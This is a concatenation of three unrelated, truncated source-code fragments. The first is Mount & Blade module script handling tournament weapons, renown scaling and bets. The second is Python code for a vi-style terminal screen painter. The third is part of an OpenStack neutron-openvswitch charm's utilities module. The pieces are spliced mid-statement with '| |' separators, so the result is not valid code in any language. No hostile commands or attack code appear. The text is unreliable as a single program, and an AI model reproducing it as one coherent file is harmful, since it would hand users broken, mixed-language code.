(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_archery"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", "itm_practice_arrows"),
(str_store_item_name, s2, ":item_enh_archery"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_bow, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_archery"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", "itm_practice_arrows"),
(str_store_item_name, s2, ":item_normal_archery"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Single handed weapons
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_onehand, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_onehand"),
(str_store_item_name, s2, ":item_enh_onehand"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_onehand, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_onehand"),
(str_store_item_name, s2, ":item_normal_onehand"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Two handed weapons
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_twohand, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_twohand"),
(str_store_item_name, s2, ":item_enh_twohand"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_twohand, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_twohand"),
(str_store_item_name, s2, ":item_normal_twohand"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Crossbows
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_crossbow, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_crossbow"),
(str_store_item_name, s2, ":item_enh_crossbow"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", "itm_practice_bolts"),
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_crossbow, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_crossbow"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", "itm_practice_bolts"),
(str_store_item_name, s2, ":item_normal_crossbow"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Thown Weapons
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_throwing, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_throwing"),
(str_store_item_name, s2, ":item_enh_throwing"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_throwing, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_throwing"),
(str_store_item_name, s2, ":item_normal_throwing"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Polearms
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_polearm, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_polearm"),
(str_store_item_name, s2, ":item_enh_polearm"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_polearm, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_polearm"),
(str_store_item_name, s2, ":item_normal_polearm"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
(try_begin),
(ge, DEBUG_TPE_DESIGN, 1), # Very verbose display.
(str_store_troop_name, s2, ":troop_id"),
(display_message, "@DEBUG (TPE): {s2} receives {s1}."),
(try_end),
]),
## TOURNAMENT PLAY ENHANCEMENTS end
# script_tpe_determine_scaled_renown
# This section implements the "Renown Scaling" feature.
# Inputs: troop_id
# Output: reg0 (new renown)
("tpe_determine_scaled_renown",
[
(store_script_param, ":troop_no", 1),
# Determine renown gained by player level.
(store_character_level, ":player_level", ":troop_no"),
(store_div, ":sr_level_factor", 40, ":player_level"), # Balanced for a max level of 40. Beyond this you get minimum gain.
(val_mul, ":sr_level_factor", 5),
(store_div, ":sr_factor_limit", wp_tpe_max_renown, 2), # Since two factors are used. Total is split by 2.
(val_min, ":sr_level_factor", ":sr_factor_limit"), # Prevents an extremely low level gaining more renown than intended.
(val_max, ":sr_level_factor", 5), # Sets a minimum renown gain of 5 no matter how high your level is.
# Determine renown gained by player renown.
(troop_get_slot, ":player_renown", ":troop_no", slot_troop_renown),
(store_div, ":sr_renown_factor", 1500, ":player_renown"), # Balanced for a max renown of 1500. Beyond this you get minimum gain.
(val_mul, ":sr_renown_factor", 5),
(store_div, ":sr_factor_limit", wp_tpe_max_renown, 2), # Since two factors are used. Total is split by 2.
(val_min, ":sr_renown_factor", ":sr_factor_limit"), # Prevents an extremely low level gaining more renown than intended.
(val_max, ":sr_renown_factor", 5), # Sets a minimum renown gain of 5 no matter how high your level is.
(store_add, reg0, ":sr_level_factor", ":sr_renown_factor"), # combines both factors.
]),
###########################################################################################################################
##### TPE 1.3 Additions #####
###########################################################################################################################
###########################################################################################################################
##### REWARDS & BETTING #####
###########################################################################################################################
# script_tpe_set_bet
# Figures out what your persistent bet is and places it accordingly each round.
# Input: none
# Output: none
("tpe_set_bet",
[
(try_begin),
(eq, "$g_wp_tpe_active", 1),
(call_script, "script_tpe_calculate_wager_for_bid"),
(assign, ":bid", reg2),
(troop_get_slot, ":wager", TPE_OPTIONS, tpe_val_bet_wager),
# If the player doesn't want to wager anything or isn't making a bid no bet should be placed.
(ge, ":bid", 1),
(ge, ":wager", 1),
(store_troop_gold,":current_gold","trp_player"),
(try_begin),
(ge, ":current_gold", ":wager"),
(call_script, "script_tournament_place_bet", ":wager"),
(store_troop_gold,":current_gold","trp_player"),
(assign, reg1, ":current_gold"),
(assign, reg0, ":wager"),
(assign, reg2, ":bid"),
#(display_message, "@You place a bet of {reg0} denars before starting the round. You have {reg1} denars remaining."),
(display_message, "str_tpe_message_round_bid", gpu_green),
(display_message, "str_tpe_message_round_cash_left"),
(else_try),
(assign, reg0, ":wager"),
(display_message, "str_tpe_message_cant_cover_bet", gpu_red),
(try_end),
(try_end),
]),
# script_tpe_calculate_wager_for_bid
# Takes your input of a target number of points to earn then returns the applicable bid.
# Input: (bid)
# Output: reg3 (wager)
("tpe_calculate_wager_for_bid",
[
(troop_get_slot, ":bid", TPE_OPTIONS, tpe_val_bet_bid),
(troop_get_slot, ":wager", TPE_OPTIONS, tpe_val_bet_wager),
# Determine how many kills are even possible given the current team setup.
(assign, ":team_size", "$g_tournament_next_team_size"),
(assign, ":team_number", "$g_tournament_next_num_teams"),
(val_sub, ":team_number", 1),
(store_mul, ":valid_enemies", ":team_size", ":team_number"),
(try_begin),
(lt, ":valid_enemies", ":bid"),
(assign, ":bid", ":valid_enemies"),
(try_end),
#(assign, ":bid_amount", reg3),
#### CONFIGURE PAYOUT ####
(store_mul, ":bid_times_100", ":bid", 100),
(store_div, ":percent_of_enemies", ":bid_times_100", ":valid_enemies"),
(store_mul, ":bid_payout_factor", ":percent_of_enemies", 15),
(val_add, ":bid_payout_factor", 100),
(store_mul, ":payout", ":wager", ":bid_payout_factor"),
(val_div, ":payout", 100),
(try_begin),
(str_clear, s21),
(store_mul, ":max_limit", ":valid_enemies", 300),
(val_min, ":payout", ":max_limit"),
(ge, ":payout", ":max_limit"),
(str_store_string, s21, "@ (limited)"),
(else_try),
(ge, ":payout", wp_tpe_maximum_payout_per_round),
(val_min, ":payout", wp_tpe_maximum_payout_per_round),
(str_store_string, s21, "@ (limited)"),
(try_end),
(assign, reg4, ":payout"),
(str_store_string, s22, "str_tpe_label_bid_payout_r4"),
(str_store_string, s23, "@{s22}{s21}"),
(assign, reg2, ":bid"),
(assign, reg3, ":wager"),
(assign, reg4, ":payout"),
(try_begin),
### TOURNAMENT OPTIONS PANEL ###
(is_presentation_active, "prsnt_tournament_options_panel"),
# Set the BID slider | |
else:
char_rows = len(set(_.row for _ in char_pins))
if char_rows == 1:
rep = "{} chars in 1 line".format(len(char_pins))
else:
rep = "{} chars across {} lines".format(len(char_pins), char_rows)
return rep
#
# Stack the I/O of a Terminal
# as TerminalPainter > TerminalShadow > TerminalDriver
#
class TerminalPainter:
"""Paint a Screen of Rows of Chars"""
# pylint: disable=too-many-instance-attributes
def __init__(self, terminal):
self.terminal = terminal # layer over a TerminalShadow
self.rows = None # count Rows on Screen
self.columns = None # count Columns per Row
self.scrolling_rows = None # count Scrolling Rows at top of Screen
self.status_row = None # index the 1 Status Row at bottom of Screen
self.top_line_number = 1 # number the Scrolling Rows down from First of Screen
self.model_line_number = 1 # right-justify the Line Numbers
self.painting_line_number = None # number the Scrolling Rows visibly, or not
# TODO: all = None in TerminalPainter.__init__
def __enter__(self):
"""Connect Keyboard and switch Screen to XTerm Alt Screen"""
if self.rows is None:
self.terminal.__enter__()
self.reopen_terminal()
def __exit__(self, exc_type, exc_value, exc_traceback):
"""Switch Screen to Xterm Main Screen and disconnect Keyboard"""
rows = self.rows
terminal = self.terminal
if rows is not None:
self.rows = None
self.columns = None # TODO: think into how much TerminalPainter to wipe
terminal.__exit__(exc_type, exc_value, exc_traceback) # pos args
def reopen_terminal(self):
"""Clear the Caches of this Terminal, here and below"""
terminal = self.terminal
size = terminal.reopen_terminal() # a la os.get_terminal_size(fd)
(columns, rows) = (size.columns, size.lines)
assert rows
assert columns
self.rows = rows
self.columns = columns
self.scrolling_rows = rows - 1 # reserve last 1 line for Status
self.status_row = self.scrolling_rows
return size
def pdb_set_trace(self):
"""Visit Pdb, if Stdin is Tty, else raise 'bdb.BdbQuit'"""
exc_info = (None, None, None) # commonly equal to 'sys.exc_info()' here
self.__exit__(*exc_info)
pdb.set_trace() # pylint: disable=forgotten-debug-statement
self.__enter__()
def flush_painter(self):
"""Stop waiting for more Writes from above"""
self.terminal.flush()
def take_painter_chord(self):
"""Block till TerminalDriver 'kbhit', to return next Keyboard Input"""
chord = self.terminal.getch()
return chord
def terminal_print(self, *args, end="\r\n"):
"""Bypass the cache here: Write line, slip to next, and scroll up if need be"""
line = " ".join(str(_) for _ in args)
self.terminal_write(line + end)
def terminal_write(self, chars):
"""Bypass the cache here: Write the Chars immediately, precisely as given"""
self.terminal.write(chars)
def terminal_write_scrolled_status(self, pin, status):
"""Repaint a copy of the Status Line, as if scrolled to top of Screen"""
erased_line = self.columns * " "
self.terminal_write(CUP_1_1)
self.terminal_write(erased_line)
self.terminal_write(CUP_1_1)
self.terminal_write(status[: (self.columns - 1)])
y = 1 + pin.row
x = 1 + pin.column
self.terminal_write(CUP_Y_X.format(y, x))
def paint_screen(self, ended_lines, spans, status, cursor_style, cursor, bell):
"""Write over the Rows of Chars on Screen"""
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
(row, column) = self.spot_nearby_cursor(cursor.row, column=cursor.column)
columns = self.columns
terminal = self.terminal
# Fill the Screen with Lines of "~" past the last Line of File
viewing = cursor_style == _VIEW_CURSOR_STYLE_
lines = self._format_screen_lines(ended_lines, viewing)
# Write the formatted chars
terminal.write(ED_2)
terminal.write(CUP_1_1)
for (index, line) in enumerate(lines):
(styled, line_plus) = self.style_line(
index, line=line, cursor=cursor, spans=spans
)
if len(line_plus) < columns:
terminal.write(styled + "\r\n")
else:
terminal.write(styled) # depend on automagic "\r\n" after Last Column
# Show status, inside the last Row
# but don't write over the Lower Right Char # TODO: test vs xterm autoscroll
str_status = "" if (status is None) else str(status)
status_columns = columns - 1
status_line = str_status[:status_columns].ljust(status_columns)
for chord in sorted(C0_CONTROL_STDINS):
if chord.decode() in status_line:
status_line = repr(status_line)[:status_columns].ljust(status_columns)
assert False, status_line # unreached
break
terminal.write(status_line)
# Style the cursor
if cursor_style is not None:
terminal.write(cursor_style)
# Place the cursor
y = 1 + row
x = 1 + column
terminal.write(CUP_Y_X.format(y, x))
# Ring the bell
if bell:
terminal.write("\a")
# Vi Py ends with . ~ ~ ~ ... when the File ends without a Line-End
# Vim quirkily shows the last Lines the same, no matter ended by Line-End
# TODO: invent ways for Vi Py and Em Py to edit the Line-End's
def _format_screen_lines(self, ended_lines, viewing):
"""Choose a Screen of Lines to show many Columns of these Ended Lines"""
columns = self.columns
scrolling_rows = self.scrolling_rows
# Drop the Line End's
bare_lines = list(str_remove_line_end(_) for _ in ended_lines)
# Pick out the Vi Py case of inserting or replacing into an Empty File
# and lead with an empty Filler Line in that case
if not bare_lines:
if not viewing:
if not wearing_em():
bare_lines.append("")
# Number the Scrolling Lines of the Screen
lines = list()
for (index, bare_line) in enumerate(bare_lines):
str_line_number = self.format_as_line_number(index)
line = (str_line_number + bare_line)[:columns]
lines.append(line)
# Pick out the Vi Py case of a File whose Last Line has no Line End,
# and lead with a Filler Line of a single "." Dot in that case
if len(lines) < scrolling_rows:
if lines_last_has_no_end(ended_lines):
if not wearing_em():
lines.append(".")
# Complete the screen, with "~" for Vi Py or with "" for Em Py
while len(lines) < scrolling_rows:
if wearing_em():
lines.append("")
else:
lines.append("~")
# Vi Py shows an empty File as occupying no space
# Vim Quirk presents empty File same as a File of 1 Blank Line
# Assert Screen completed
assert len(lines) == scrolling_rows, (len(lines), scrolling_rows)
return lines
def spot_nearby_cursor(self, row, column):
"""Choose a Row:Column to stand for a Row:Column on or off Screen"""
columns = self.columns
scrolling_rows = self.scrolling_rows
rows = self.rows
assert rows
assert columns
found_row = min(rows - 1, row)
left_column = self.spot_left_column() if (row < scrolling_rows) else 0
found_column = min(columns - 1, left_column + column)
return (found_row, found_column)
def spot_left_column(self):
"""Find the leftmost Column occupied by the Chars of the Scrolling Lines"""
formatted = self.format_as_line_number(row=0)
left_column = len(formatted)
return left_column
def format_as_line_number(self, row):
"""Format a Row Index on Screen as a Line Number of File"""
if not self.painting_line_number:
return ""
str_model_line_number = "{:3} ".format(self.model_line_number)
if wearing_em():
str_model_line_number = " {} ".format(self.model_line_number)
last_width = len(str_model_line_number)
line_number = self.top_line_number + row
formatted = "{:3} ".format(line_number).rjust(last_width)
if wearing_em():
formatted = " {} ".format(line_number).rjust(last_width)
return formatted
def style_line(self, row, line, cursor, spans):
"""Inject kinds of SGR so as to style the Chars of a Row"""
# pylint: disable=too-many-locals
# Work only inside this Row
(spans0, line_plus) = self.spread_spans(row, line=line, spans=spans)
# Add a one Char Span at the Cursor
# to show SGR_N in placed of DECSCUSR_N for styling the Cursor
spans1 = list(spans0)
if False: # pylint: disable=using-constant-test
if row == cursor.row:
cursor_span = TerminalSpan(
row=cursor.row, column=cursor.column, beyond=(cursor.column + 1)
)
spans1.append(cursor_span)
spans1.sort()
# Add one Empty Span beyond the end
beyond = len(line_plus)
empty_beyond_span = TerminalSpan(row, column=beyond, beyond=beyond)
spans2 = list(spans1)
spans2.append(empty_beyond_span)
# Visit the Chars between each pair of Spans, and the Chars of the Spans
visited = 0
opened = False
styled = ""
for span in spans2:
# Write the Chars before this Span, as Highlight never opened or as closed
if visited < span.column:
fragment = line_plus[visited : span.column]
styled += _LIT_CLOSE_ if opened else ""
styled += fragment
opened = False
visited = span.column
# Write the Chars of this Span, as Highlight opened
if span.column < span.beyond:
fragment = line_plus[span.column : span.beyond]
styled += "" if opened else _LIT_OPEN_
styled += fragment
opened = True
visited = span.beyond
# Close the last opened Highlight, if it exists
styled += _LIT_CLOSE_ if opened else ""
return (styled, line_plus)
def spread_spans(self, row, line, spans):
"""Spread each Empty Span to cover one more Column beyond it"""
# pylint: disable=too-many-locals
columns = self.columns
left_column = self.spot_left_column()
assert len(line) <= columns, (len(line), columns)
# Look only at the Columns on Screen of This Row
row_spans = list()
for span in spans:
if span.row == row:
column = left_column + span.column
if column < columns:
beyond = min(columns, left_column + span.beyond)
row_span = TerminalSpan(row, column=column, beyond=beyond)
row_spans.append(row_span)
# Visit each Empty Span
for (index, span) in enumerate(row_spans):
column = left_column + span.column
beyond = left_column + span.beyond
assert span.column <= span.beyond <= columns, (span, columns)
if | |
<reponame>CanonicalBootStack/charm-neutron-openvswitch
# Copyright 2016 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import json
import os
from itertools import chain
import shutil
import subprocess
from charmhelpers.contrib.openstack.neutron import neutron_plugin_attribute
from copy import deepcopy
from charmhelpers.contrib.openstack import context, templating
from charmhelpers.contrib.openstack.utils import (
pause_unit,
resume_unit,
make_assess_status_func,
is_unit_paused_set,
os_application_version_set,
remote_restart,
CompareOpenStackReleases,
os_release,
)
from collections import OrderedDict
import neutron_ovs_context
from charmhelpers.contrib.network.ovs import (
add_bridge,
add_bridge_port,
is_linuxbridge_interface,
add_ovsbridge_linuxbridge,
full_restart,
enable_ipfix,
disable_ipfix,
)
from charmhelpers.core.hookenv import (
config,
status_set,
log,
)
from charmhelpers.contrib.openstack.neutron import (
parse_bridge_mappings,
determine_dkms_package,
headers_package,
)
from charmhelpers.contrib.openstack.context import (
ExternalPortContext,
DataPortContext,
WorkerConfigContext,
parse_data_port_mappings,
)
from charmhelpers.core.host import (
lsb_release,
service,
service_restart,
service_running,
CompareHostReleases,
init_is_systemd,
group_exists,
user_exists,
)
from charmhelpers.fetch import (
apt_install,
apt_purge,
apt_update,
filter_installed_packages,
filter_missing_packages,
apt_autoremove,
get_upstream_version
)
from pci import PCINetDevices
# The interface is said to be satisfied if anyone of the interfaces in the
# list has a complete context.
# LY: Note the neutron-plugin is always present since that is the relation
# with the principle and no data currently flows down from the principle
# so there is no point in having it in REQUIRED_INTERFACES
REQUIRED_INTERFACES = {
'messaging': ['amqp', 'zeromq-configuration'],
}
VERSION_PACKAGE = 'neutron-common'
NOVA_CONF_DIR = "/etc/nova"
NEUTRON_DHCP_AGENT_CONF = "/etc/neutron/dhcp_agent.ini"
NEUTRON_DNSMASQ_CONF = "/etc/neutron/dnsmasq.conf"
NEUTRON_CONF_DIR = "/etc/neutron"
NEUTRON_CONF = '%s/neutron.conf' % NEUTRON_CONF_DIR
NEUTRON_DEFAULT = '/etc/default/neutron-server'
NEUTRON_L3_AGENT_CONF = "/etc/neutron/l3_agent.ini"
NEUTRON_FWAAS_CONF = "/etc/neutron/fwaas_driver.ini"
ML2_CONF = '%s/plugins/ml2/ml2_conf.ini' % NEUTRON_CONF_DIR
OVS_CONF = '%s/plugins/ml2/openvswitch_agent.ini' % NEUTRON_CONF_DIR
EXT_PORT_CONF = '/etc/init/ext-port.conf'
NEUTRON_METADATA_AGENT_CONF = "/etc/neutron/metadata_agent.ini"
DVR_PACKAGES = ['neutron-l3-agent']
DHCP_PACKAGES = ['neutron-dhcp-agent']
METADATA_PACKAGES = ['neutron-metadata-agent']
PY3_PACKAGES = [
'python3-neutron',
]
PURGE_PACKAGES = [
'python-neutron',
'python-neutron-fwaas',
]
PHY_NIC_MTU_CONF = '/etc/init/os-charm-phy-nic-mtu.conf'
TEMPLATES = 'templates/'
OVS_DEFAULT = '/etc/default/openvswitch-switch'
DPDK_INTERFACES = '/etc/dpdk/interfaces'
NEUTRON_SRIOV_AGENT_CONF = os.path.join(NEUTRON_CONF_DIR,
'plugins/ml2/sriov_agent.ini')
NEUTRON_SRIOV_INIT_SCRIPT = os.path.join('/etc/init.d',
'neutron-openvswitch-'
'networking-sriov.sh')
NEUTRON_SRIOV_INIT_DEFAULT = os.path.join('/etc/default',
'neutron-openvswitch-'
'networking-sriov')
NEUTRON_SRIOV_SYSTEMD_UNIT = os.path.join('/lib/systemd/system',
'neutron-openvswitch-'
'networking-sriov.service')
NEUTRON_SRIOV_UPSTART_CONF = os.path.join('/etc/init',
'neutron-openvswitch-'
'networking-sriov.conf')
BASE_RESOURCE_MAP = OrderedDict([
(NEUTRON_CONF, {
'services': ['neutron-plugin-openvswitch-agent'],
'contexts': [neutron_ovs_context.OVSPluginContext(),
neutron_ovs_context.RemoteRestartContext(
['neutron-plugin', 'neutron-control']),
context.AMQPContext(ssl_dir=NEUTRON_CONF_DIR),
context.ZeroMQContext(),
context.NotificationDriverContext()],
}),
(ML2_CONF, {
'services': ['neutron-plugin-openvswitch-agent'],
'contexts': [neutron_ovs_context.OVSPluginContext()],
}),
(OVS_CONF, {
'services': ['neutron-openvswitch-agent'],
'contexts': [neutron_ovs_context.OVSPluginContext()],
}),
(OVS_DEFAULT, {
'services': ['openvswitch-switch'],
'contexts': [neutron_ovs_context.OVSDPDKDeviceContext(),
neutron_ovs_context.RemoteRestartContext(
['neutron-plugin', 'neutron-control'])],
}),
(DPDK_INTERFACES, {
'services': ['dpdk', 'openvswitch-switch'],
'contexts': [neutron_ovs_context.DPDKDeviceContext()],
}),
(PHY_NIC_MTU_CONF, {
'services': ['os-charm-phy-nic-mtu'],
'contexts': [context.PhyNICMTUContext()],
}),
])
METADATA_RESOURCE_MAP = OrderedDict([
(NEUTRON_METADATA_AGENT_CONF, {
'services': ['neutron-metadata-agent'],
'contexts': [neutron_ovs_context.SharedSecretContext(),
neutron_ovs_context.APIIdentityServiceContext(),
WorkerConfigContext()],
}),
])
DHCP_RESOURCE_MAP = OrderedDict([
(NEUTRON_DHCP_AGENT_CONF, {
'services': ['neutron-dhcp-agent'],
'contexts': [neutron_ovs_context.DHCPAgentContext()],
}),
(NEUTRON_DNSMASQ_CONF, {
'services': ['neutron-dhcp-agent'],
'contexts': [neutron_ovs_context.DHCPAgentContext()],
}),
])
DVR_RESOURCE_MAP = OrderedDict([
(NEUTRON_L3_AGENT_CONF, {
'services': ['neutron-l3-agent'],
'contexts': [neutron_ovs_context.L3AgentContext()],
}),
(NEUTRON_FWAAS_CONF, {
'services': ['neutron-l3-agent'],
'contexts': [neutron_ovs_context.L3AgentContext()],
}),
(EXT_PORT_CONF, {
'services': ['neutron-l3-agent'],
'contexts': [context.ExternalPortContext()],
}),
])
SRIOV_RESOURCE_MAP = OrderedDict([
(NEUTRON_SRIOV_AGENT_CONF, {
'services': ['neutron-sriov-agent'],
'contexts': [neutron_ovs_context.OVSPluginContext()],
}),
(NEUTRON_SRIOV_INIT_DEFAULT, {
'services': [],
'contexts': [neutron_ovs_context.OVSPluginContext()],
}),
(NEUTRON_SRIOV_INIT_SCRIPT, {
'services': [],
'contexts': [],
}),
(NEUTRON_SRIOV_SYSTEMD_UNIT, {
'services': [],
'contexts': [],
}),
(NEUTRON_SRIOV_UPSTART_CONF, {
'services': [],
'contexts': [],
}),
])
TEMPLATES = 'templates/'
INT_BRIDGE = "br-int"
EXT_BRIDGE = "br-ex"
DATA_BRIDGE = 'br-data'
def install_packages():
apt_update()
# NOTE(jamespage): install neutron-common package so we always
# get a clear signal on which OS release is
# being deployed
apt_install(filter_installed_packages(['neutron-common']),
fatal=True)
# NOTE(jamespage): ensure early install of dkms related
# dependencies for kernels which need
# openvswitch via dkms (12.04).
dkms_packages = determine_dkms_package()
if dkms_packages:
apt_install([headers_package()] + dkms_packages, fatal=True)
missing_packages = filter_installed_packages(determine_packages())
if missing_packages:
status_set('maintenance', 'Installing packages')
apt_install(missing_packages,
fatal=True)
if use_dpdk():
enable_ovs_dpdk()
def purge_packages(pkg_list):
purge_pkgs = []
required_packages = determine_packages()
for pkg in pkg_list:
if pkg not in required_packages:
purge_pkgs.append(pkg)
purge_pkgs = filter_missing_packages(purge_pkgs)
if purge_pkgs:
status_set('maintenance', 'Purging unused packages')
apt_purge(purge_pkgs, fatal=True)
apt_autoremove(purge=True, fatal=True)
def determine_packages():
pkgs = []
py3_pkgs = []
plugin_pkgs = neutron_plugin_attribute('ovs', 'packages', 'neutron')
for plugin_pkg in plugin_pkgs:
pkgs.extend(plugin_pkg)
if use_dvr():
pkgs.extend(DVR_PACKAGES)
py3_pkgs.append('python3-neutron-fwaas')
if enable_local_dhcp():
pkgs.extend(DHCP_PACKAGES)
pkgs.extend(METADATA_PACKAGES)
cmp_release = CompareOpenStackReleases(
os_release('neutron-common', base='icehouse',
reset_cache=True))
if cmp_release >= 'mitaka' and 'neutron-plugin-openvswitch-agent' in pkgs:
pkgs.remove('neutron-plugin-openvswitch-agent')
pkgs.append('neutron-openvswitch-agent')
if use_dpdk():
pkgs.append('openvswitch-switch-dpdk')
if enable_sriov():
if cmp_release >= 'mitaka':
pkgs.append('neutron-sriov-agent')
else:
pkgs.append('neutron-plugin-sriov-agent')
if cmp_release >= 'rocky':
pkgs = [p for p in pkgs if not p.startswith('python-')]
pkgs.extend(PY3_PACKAGES)
pkgs.extend(py3_pkgs)
return pkgs
def determine_purge_packages():
cmp_release = CompareOpenStackReleases(
os_release('neutron-common', base='icehouse',
reset_cache=True))
if cmp_release >= 'rocky':
return PURGE_PACKAGES
return []
def register_configs(release=None):
release = release or os_release('neutron-common', base='icehouse')
configs = templating.OSConfigRenderer(templates_dir=TEMPLATES,
openstack_release=release)
for cfg, rscs in resource_map().items():
configs.register(cfg, rscs['contexts'])
return configs
def resource_map():
'''
Dynamically generate a map of resources that will be managed for a single
hook execution.
'''
drop_config = []
resource_map = deepcopy(BASE_RESOURCE_MAP)
if use_dvr():
resource_map.update(DVR_RESOURCE_MAP)
resource_map.update(METADATA_RESOURCE_MAP)
dvr_services = ['neutron-metadata-agent', 'neutron-l3-agent']
resource_map[NEUTRON_CONF]['services'] += dvr_services
if enable_local_dhcp():
resource_map.update(METADATA_RESOURCE_MAP)
resource_map.update(DHCP_RESOURCE_MAP)
metadata_services = ['neutron-metadata-agent', 'neutron-dhcp-agent']
resource_map[NEUTRON_CONF]['services'] += metadata_services
# Remap any service names as required
_os_release = os_release('neutron-common', base='icehouse')
if CompareOpenStackReleases(_os_release) >= 'mitaka':
# ml2_conf.ini -> openvswitch_agent.ini
drop_config.append(ML2_CONF)
# drop of -plugin from service name
resource_map[NEUTRON_CONF]['services'].remove(
'neutron-plugin-openvswitch-agent'
)
resource_map[NEUTRON_CONF]['services'].append(
'neutron-openvswitch-agent'
)
if not use_dpdk():
drop_config.append(DPDK_INTERFACES)
drop_config.append(OVS_DEFAULT)
elif ovs_has_late_dpdk_init():
drop_config.append(OVS_DEFAULT)
else:
drop_config.extend([OVS_CONF, DPDK_INTERFACES])
if enable_sriov():
sriov_agent_name = 'neutron-sriov-agent'
sriov_resource_map = deepcopy(SRIOV_RESOURCE_MAP)
if CompareOpenStackReleases(_os_release) < 'mitaka':
sriov_agent_name = 'neutron-plugin-sriov-agent'
# Patch resource_map for Kilo and Liberty
sriov_resource_map[NEUTRON_SRIOV_AGENT_CONF]['services'] = \
[sriov_agent_name]
resource_map.update(sriov_resource_map)
resource_map[NEUTRON_CONF]['services'].append(
sriov_agent_name)
# Use MAAS1.9 for MTU and external port config on xenial and above
if CompareHostReleases(lsb_release()['DISTRIB_CODENAME']) >= 'xenial':
drop_config.extend([EXT_PORT_CONF, PHY_NIC_MTU_CONF])
for _conf in drop_config:
try:
del resource_map[_conf]
except KeyError:
pass
return resource_map
def restart_map():
'''
Constructs a restart map based on charm config settings and relation
state.
'''
return {k: v['services'] for k, v in resource_map().items()}
def services():
"""Returns a list of (unique) services associate with this charm
Note that we drop the os-charm-phy-nic-mtu service as it's not an actual
running service that we can check for.
@returns [strings] - list of service names suitable for (re)start_service()
"""
s_set = set(chain(*restart_map().values()))
s_set.discard('os-charm-phy-nic-mtu')
return list(s_set)
def determine_ports():
"""Assemble a list of API ports for services the charm is managing
@returns [ports] - list of ports that the charm manages.
"""
ports = []
if use_dvr():
ports.append(DVR_RESOURCE_MAP[EXT_PORT_CONF]["ext_port"])
return ports
UPDATE_ALTERNATIVES = ['update-alternatives', '--set', 'ovs-vswitchd']
OVS_DPDK_BIN = '/usr/lib/openvswitch-switch-dpdk/ovs-vswitchd-dpdk'
OVS_DEFAULT_BIN = '/usr/lib/openvswitch-switch/ovs-vswitchd'
# TODO(jamespage): rework back to charmhelpers
def set_Open_vSwitch_column_value(column, value):
"""
Calls ovs-vsctl and sets the 'column=value' in the Open_vSwitch table.
:param column: colume name to set value for
:param value: value to set
See http://www.openvswitch.org//ovs-vswitchd.conf.db.5.pdf for
details of the relevant values.
:type str
:returns bool: indicating if a column value was changed
:raises CalledProcessException: possibly ovsdb-server is not running
"""
current_value = None
try:
current_value = json.loads(subprocess.check_output(
['ovs-vsctl', 'get', 'Open_vSwitch', '.', column]
))
except subprocess.CalledProcessError:
pass
if current_value != value:
